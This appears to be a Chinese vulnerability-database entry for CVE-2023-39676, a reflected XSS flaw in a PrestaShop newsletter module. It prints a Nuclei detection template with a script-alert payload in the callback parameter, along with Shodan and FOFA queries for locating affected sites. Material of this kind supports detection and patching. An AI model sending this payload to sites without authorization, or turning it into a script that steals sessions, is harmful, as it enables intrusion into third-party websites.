CVE-2023-39676: PrestaShop fieldpopupnewsletter Module - Cross Site Scripting

日期: 2025-08-01 | 影响软件: PrestaShop fieldpopupnewsletter Module | POC: 已公开

漏洞描述

Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.

PoC代码[已公开]

id: CVE-2023-39676

info:
  name: PrestaShop fieldpopupnewsletter Module - Cross Site Scripting
  author: meme-lord
  severity: medium
  description: |
    Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential theft of sensitive information, session hijacking, or defacement.
  reference:
    - https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/
    - https://sorcery.ie
    - https://themeforest.net/user/fieldthemes
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-39676
    cwe-id: CWE-79
    epss-score: 0.07018
    epss-percentile: 0.91126
    cpe: cpe:2.3:a:fieldthemes:fieldpopupnewsletter:1.0.0:*:*:*:*:prestashop:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: fieldthemes
    product: fieldpopupnewsletter
    framework: prestashop
    shodan-query:
      - html:"fieldpopupnewsletter"
      - http.html:"fieldpopupnewsletter"
    fofa-query: body="fieldpopupnewsletter"
  tags: cve2023,cve,prestashop,xss,fieldthemes

http:
  - method: GET
    path:
      - "{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "Invalid email"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402201dfe94167583a54eee82d5246129a37bace99d1707e8de1eb2492b7dc960bd7c02207be262f25cd8d7c4ab21c1b3de7110de410f02b1b9a32b1730823e9d221f07d9:922c64590222798bb761d5b6d8e72950

相关漏洞推荐